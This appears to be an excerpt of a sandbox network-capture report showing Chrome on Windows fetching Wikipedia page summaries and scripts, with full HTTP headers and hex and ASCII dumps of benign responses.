                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC456OUTGET /wiki/Special:CentralAutoLogin/checkLoggedIn?useformat=desktop&wikiid=enwiki&type=script&wikiid=enwiki&type=script HTTP/1.1
                                                                                                                                                                                                                                      Host: login.wikimedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC1196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 17:43:54 GMT
                                                                                                                                                                                                                                      server: mw-web.codfw.main-ddbb68945-pn2k5
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      accept-ch:
                                                                                                                                                                                                                                      vary: Accept-Encoding,Cookie,Authorization
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      age: 542
                                                                                                                                                                                                                                      x-cache: cp3072 miss, cp3072 hit/5247
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      set-cookie: WMF-Last-Access=07-Jan-2025;Path=/;HttpOnly;secure;Expires=Sat, 08 Feb 2025 12:00:00 GMT
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      cache-control: private, s-maxage=0, max-age=0, must-revalidate, no-transform
                                                                                                                                                                                                                                      set-cookie: GeoIP=US:NY:New_York:40.71:-74.01:v4; Path=/; secure; Domain=.wikimedia.org
                                                                                                                                                                                                                                      set-cookie: NetworkProbeLimit=0.001;Path=/;Secure;SameSite=Lax;Max-Age=3600
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 252
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:52:56 UTC252INData Raw: 2f 2a 20 4e 6f 74 20 63 65 6e 74 72 61 6c 6c 79 20 6c 6f 67 67 65 64 20 69 6e 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6e 65 77 20 44 61 74 65 28 29 3b 74 2e 73 65 74 54 69 6d 65 28 74 2e 67 65 74 54 69 6d 65 28 29 2b 38 36 34 30 30 30 30 30 29 3b 74 72 79 7b 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 27 43 65 6e 74 72 61 6c 41 75 74 68 41 6e 6f 6e 27 2c 74 2e 67 65 74 54 69 6d 65 28 29 29 3b 7d 63 61 74 63 68 28 65 29 7b 74 72 79 7b 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 27 43 65 6e 74 72 61 6c 41 75 74 68 41 6e 6f 6e 3d 31 3b 20 65 78 70 69 72 65 73 3d 27 2b 74 2e 74 6f 47 4d 54 53 74 72 69 6e 67 28 29 2b 27 3b 20 70 61 74 68 3d 2f 27 3b 7d 63 61 74 63 68 28 65 32 29 7b 7d 7d 7d 28 29 29 3b
                                                                                                                                                                                                                                      Data Ascii: /* Not centrally logged in */(function(){var t=new Date();t.setTime(t.getTime()+86400000);try{localStorage.setItem('CentralAuthAnon',t.getTime());}catch(e){try{document.cookie='CentralAuthAnon=1; expires='+t.toGMTString()+'; path=/';}catch(e2){}}}());


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      78192.168.2.1649811185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:53:28 UTC843OUTGET /api/rest_v1/page/summary/Programmer HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      Accept: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.2.0"
                                                                                                                                                                                                                                      Accept-Language: en
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:53:28 UTC1677INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 01:01:19 GMT
                                                                                                                                                                                                                                      content-location: https://en.wikipedia.org/api/rest_v1/page/summary/Programmer
                                                                                                                                                                                                                                      cache-control: s-maxage=1209600, max-age=300
                                                                                                                                                                                                                                      vary: x-restbase-compat, Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      etag: W/"1267203979/dcc07f30-ca42-11ef-919a-c59181cad1a2"
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.5.0"
                                                                                                                                                                                                                                      content-language: en
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: GET,HEAD
                                                                                                                                                                                                                                      access-control-allow-headers: accept, content-type, content-length, cache-control, accept-language, api-user-agent, if-match, if-modified-since, if-none-match, dnt, accept-encoding
                                                                                                                                                                                                                                      access-control-expose-headers: etag
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      referrer-policy: origin-when-cross-origin
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      content-security-policy: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      x-content-security-policy: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      x-webkit-csp: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      age: 60729
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/1247
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 1733
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:53:28 UTC1733INData Raw: 7b 22 74 79 70 65 22 3a 22 73 74 61 6e 64 61 72 64 22 2c 22 74 69 74 6c 65 22 3a 22 50 72 6f 67 72 61 6d 6d 65 72 22 2c 22 64 69 73 70 6c 61 79 74 69 74 6c 65 22 3a 22 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 6d 77 2d 70 61 67 65 2d 74 69 74 6c 65 2d 6d 61 69 6e 5c 22 3e 50 72 6f 67 72 61 6d 6d 65 72 3c 2f 73 70 61 6e 3e 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 7b 22 69 64 22 3a 30 2c 22 74 65 78 74 22 3a 22 22 7d 2c 22 77 69 6b 69 62 61 73 65 5f 69 74 65 6d 22 3a 22 51 35 34 38 32 37 34 30 22 2c 22 74 69 74 6c 65 73 22 3a 7b 22 63 61 6e 6f 6e 69 63 61 6c 22 3a 22 50 72 6f 67 72 61 6d 6d 65 72 22 2c 22 6e 6f 72 6d 61 6c 69 7a 65 64 22 3a 22 50 72 6f 67 72 61 6d 6d 65 72 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 6d
                                                                                                                                                                                                                                      Data Ascii: {"type":"standard","title":"Programmer","displaytitle":"<span class=\"mw-page-title-main\">Programmer</span>","namespace":{"id":0,"text":""},"wikibase_item":"Q5482740","titles":{"canonical":"Programmer","normalized":"Programmer","display":"<span class=\"m


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      79192.168.2.1649812185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:53:29 UTC568OUTGET /api/rest_v1/page/summary/Programmer HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:53:29 UTC1677INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 01:01:19 GMT
                                                                                                                                                                                                                                      content-location: https://en.wikipedia.org/api/rest_v1/page/summary/Programmer
                                                                                                                                                                                                                                      cache-control: s-maxage=1209600, max-age=300
                                                                                                                                                                                                                                      vary: x-restbase-compat, Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      etag: W/"1267203979/dcc07f30-ca42-11ef-919a-c59181cad1a2"
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.5.0"
                                                                                                                                                                                                                                      content-language: en
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: GET,HEAD
                                                                                                                                                                                                                                      access-control-allow-headers: accept, content-type, content-length, cache-control, accept-language, api-user-agent, if-match, if-modified-since, if-none-match, dnt, accept-encoding
                                                                                                                                                                                                                                      access-control-expose-headers: etag
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      referrer-policy: origin-when-cross-origin
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      content-security-policy: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      x-content-security-policy: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      x-webkit-csp: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      age: 60730
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/1248
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 1733
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:53:29 UTC1733INData Raw: 7b 22 74 79 70 65 22 3a 22 73 74 61 6e 64 61 72 64 22 2c 22 74 69 74 6c 65 22 3a 22 50 72 6f 67 72 61 6d 6d 65 72 22 2c 22 64 69 73 70 6c 61 79 74 69 74 6c 65 22 3a 22 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 6d 77 2d 70 61 67 65 2d 74 69 74 6c 65 2d 6d 61 69 6e 5c 22 3e 50 72 6f 67 72 61 6d 6d 65 72 3c 2f 73 70 61 6e 3e 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 7b 22 69 64 22 3a 30 2c 22 74 65 78 74 22 3a 22 22 7d 2c 22 77 69 6b 69 62 61 73 65 5f 69 74 65 6d 22 3a 22 51 35 34 38 32 37 34 30 22 2c 22 74 69 74 6c 65 73 22 3a 7b 22 63 61 6e 6f 6e 69 63 61 6c 22 3a 22 50 72 6f 67 72 61 6d 6d 65 72 22 2c 22 6e 6f 72 6d 61 6c 69 7a 65 64 22 3a 22 50 72 6f 67 72 61 6d 6d 65 72 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 6d
                                                                                                                                                                                                                                      Data Ascii: {"type":"standard","title":"Programmer","displaytitle":"<span class=\"mw-page-title-main\">Programmer</span>","namespace":{"id":0,"text":""},"wikibase_item":"Q5482740","titles":{"canonical":"Programmer","normalized":"Programmer","display":"<span class=\"m


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      80192.168.2.1649815185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:54:00 UTC860OUTGET /api/rest_v1/page/summary/Software_release_life_cycle HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      Accept: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.2.0"
                                                                                                                                                                                                                                      Accept-Language: en
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:54:00 UTC1693INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 15:40:55 GMT
                                                                                                                                                                                                                                      content-location: https://en.wikipedia.org/api/rest_v1/page/summary/Software_release_life_cycle
                                                                                                                                                                                                                                      cache-control: s-maxage=1209600, max-age=300
                                                                                                                                                                                                                                      vary: x-restbase-compat, Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      etag: W/"1265702247/0179c1e0-c86a-11ef-a646-ea79b7f8c1a3"
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.5.0"
                                                                                                                                                                                                                                      content-language: en
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: GET,HEAD
                                                                                                                                                                                                                                      access-control-allow-headers: accept, content-type, content-length, cache-control, accept-language, api-user-agent, if-match, if-modified-since, if-none-match, dnt, accept-encoding
                                                                                                                                                                                                                                      access-control-expose-headers: etag
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      referrer-policy: origin-when-cross-origin
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      content-security-policy: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      x-content-security-policy: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      x-webkit-csp: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      age: 7984
                                                                                                                                                                                                                                      x-cache: cp3072 miss, cp3072 hit/178
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 2163
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:54:00 UTC2163INData Raw: 7b 22 74 79 70 65 22 3a 22 73 74 61 6e 64 61 72 64 22 2c 22 74 69 74 6c 65 22 3a 22 53 6f 66 74 77 61 72 65 20 72 65 6c 65 61 73 65 20 6c 69 66 65 20 63 79 63 6c 65 22 2c 22 64 69 73 70 6c 61 79 74 69 74 6c 65 22 3a 22 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 6d 77 2d 70 61 67 65 2d 74 69 74 6c 65 2d 6d 61 69 6e 5c 22 3e 53 6f 66 74 77 61 72 65 20 72 65 6c 65 61 73 65 20 6c 69 66 65 20 63 79 63 6c 65 3c 2f 73 70 61 6e 3e 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 7b 22 69 64 22 3a 30 2c 22 74 65 78 74 22 3a 22 22 7d 2c 22 77 69 6b 69 62 61 73 65 5f 69 74 65 6d 22 3a 22 51 31 32 31 31 34 35 37 22 2c 22 74 69 74 6c 65 73 22 3a 7b 22 63 61 6e 6f 6e 69 63 61 6c 22 3a 22 53 6f 66 74 77 61 72 65 5f 72 65 6c 65 61 73 65 5f 6c 69 66 65 5f 63 79 63 6c 65 22 2c 22
                                                                                                                                                                                                                                      Data Ascii: {"type":"standard","title":"Software release life cycle","displaytitle":"<span class=\"mw-page-title-main\">Software release life cycle</span>","namespace":{"id":0,"text":""},"wikibase_item":"Q1211457","titles":{"canonical":"Software_release_life_cycle","


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      81192.168.2.1649816185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:54:01 UTC585OUTGET /api/rest_v1/page/summary/Software_release_life_cycle HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:54:01 UTC1693INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 15:40:55 GMT
                                                                                                                                                                                                                                      content-location: https://en.wikipedia.org/api/rest_v1/page/summary/Software_release_life_cycle
                                                                                                                                                                                                                                      cache-control: s-maxage=1209600, max-age=300
                                                                                                                                                                                                                                      vary: x-restbase-compat, Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      etag: W/"1265702247/0179c1e0-c86a-11ef-a646-ea79b7f8c1a3"
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8; profile="https://www.mediawiki.org/wiki/Specs/Summary/1.5.0"
                                                                                                                                                                                                                                      content-language: en
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      access-control-allow-methods: GET,HEAD
                                                                                                                                                                                                                                      access-control-allow-headers: accept, content-type, content-length, cache-control, accept-language, api-user-agent, if-match, if-modified-since, if-none-match, dnt, accept-encoding
                                                                                                                                                                                                                                      access-control-expose-headers: etag
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      referrer-policy: origin-when-cross-origin
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      content-security-policy: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      x-content-security-policy: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      x-webkit-csp: default-src 'none'; frame-ancestors 'none'
                                                                                                                                                                                                                                      age: 7985
                                                                                                                                                                                                                                      x-cache: cp3072 miss, cp3072 hit/179
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                      content-length: 2163
                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                      2025-01-07 17:54:01 UTC2163INData Raw: 7b 22 74 79 70 65 22 3a 22 73 74 61 6e 64 61 72 64 22 2c 22 74 69 74 6c 65 22 3a 22 53 6f 66 74 77 61 72 65 20 72 65 6c 65 61 73 65 20 6c 69 66 65 20 63 79 63 6c 65 22 2c 22 64 69 73 70 6c 61 79 74 69 74 6c 65 22 3a 22 3c 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 6d 77 2d 70 61 67 65 2d 74 69 74 6c 65 2d 6d 61 69 6e 5c 22 3e 53 6f 66 74 77 61 72 65 20 72 65 6c 65 61 73 65 20 6c 69 66 65 20 63 79 63 6c 65 3c 2f 73 70 61 6e 3e 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 7b 22 69 64 22 3a 30 2c 22 74 65 78 74 22 3a 22 22 7d 2c 22 77 69 6b 69 62 61 73 65 5f 69 74 65 6d 22 3a 22 51 31 32 31 31 34 35 37 22 2c 22 74 69 74 6c 65 73 22 3a 7b 22 63 61 6e 6f 6e 69 63 61 6c 22 3a 22 53 6f 66 74 77 61 72 65 5f 72 65 6c 65 61 73 65 5f 6c 69 66 65 5f 63 79 63 6c 65 22 2c 22
                                                                                                                                                                                                                                      Data Ascii: {"type":"standard","title":"Software release life cycle","displaytitle":"<span class=\"mw-page-title-main\">Software release life cycle</span>","namespace":{"id":0,"text":""},"wikibase_item":"Q1211457","titles":{"canonical":"Software_release_life_cycle","


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      82192.168.2.1649817185.15.59.2244436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC795OUTGET /w/load.php?lang=en&modules=mmv&skin=vector-2022&version=xvmbs HTTP/1.1
                                                                                                                                                                                                                                      Host: en.wikipedia.org
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                      Referer: https://en.wikipedia.org/wiki/Windows_Server_2019
                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                      Cookie: WMF-Last-Access=07-Jan-2025; WMF-Last-Access-Global=07-Jan-2025; WMF-DP=41b; GeoIP=US:NY:New_York:40.71:-74.01:v4; NetworkProbeLimit=0.001; enwikimwuser-sessionId=4ea40126dd10240cf10d
                                                                                                                                                                                                                                      2025-01-07 17:54:11 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      date: Tue, 07 Jan 2025 09:57:26 GMT
                                                                                                                                                                                                                                      etag: W/"xvmbs"
                                                                                                                                                                                                                                      expires: Wed, 05 Feb 2025 10:06:12 GMT
                                                                                                                                                                                                                                      cache-control: public, max-age=2592000, s-maxage=2592000, stale-while-revalidate=60
                                                                                                                                                                                                                                      vary: Accept-Encoding
                                                                                                                                                                                                                                      server: ATS/9.2.6
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      sourcemap: /w/load.php?lang=en&modules=mmv&skin=vector-2022&sourcemap=1&version=xvmbs
                                                                                                                                                                                                                                      content-type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                      x-cache: cp3072 hit, cp3072 hit/114499
                                                                                                                                                                                                                                      x-cache-status: hit-front
                                                                                                                                                                                                                                      server-timing: cache;desc="hit-front", host;desc="cp3072"
                                                                                                                                                                                                                                      strict-transport-security: max-age=106384710; includeSubDomains; preload
                                                                                                                                                                                                                                      report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] }
                                                                                                                                                                                                                                      nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0}
                                                                                                                                                                                                                                      x-client-ip: 8.46.123.189
